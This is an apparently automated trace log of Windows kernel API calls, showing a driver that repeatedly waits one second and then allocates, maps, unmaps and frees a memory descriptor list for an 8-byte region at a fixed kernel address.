| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a0a1560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0a1560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a0c2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a0c2560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a26e560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a26e560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a273560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a273560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a282560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a282560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a29a560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a29a560, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a4fc560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a4fc560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ae2f560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ae2f560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1b4300 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1b4300, MemoryDescriptorList_unk_out = 0xffffe0003c1b4300 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1b4300, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c4d5560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c4d5560, MemoryDescriptorList_unk = 0xffffe0003c1b4300 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1b4300 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c552560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c552560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c6a7560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c6a7560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c6a8560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c6a8560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002cd6e560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002cd6e560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002cdec560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002cdec560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002d6cb560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d6cb560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e387560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e387560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e388560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e388560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e56a560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e56a560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, MemoryDescriptorList_unk_out = 0xffffe0003b9d74c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9d74c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e5b2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e5b2560, MemoryDescriptorList_unk = 0xffffe0003b9d74c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9d74c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00045b65560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045b65560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0004a6a4560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0004a6a4560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0004a7bf560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0004a7bf560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029226560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029226560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ee71f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ee71f40, MemoryDescriptorList_unk_out = 0xffffe0003ee71f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ee71f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029804560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029804560, MemoryDescriptorList_unk = 0xffffe0003ee71f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ee71f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a37a560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a37a560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a663560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a663560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b918560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b918560, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c73d560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c73d560, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9d74c0 |
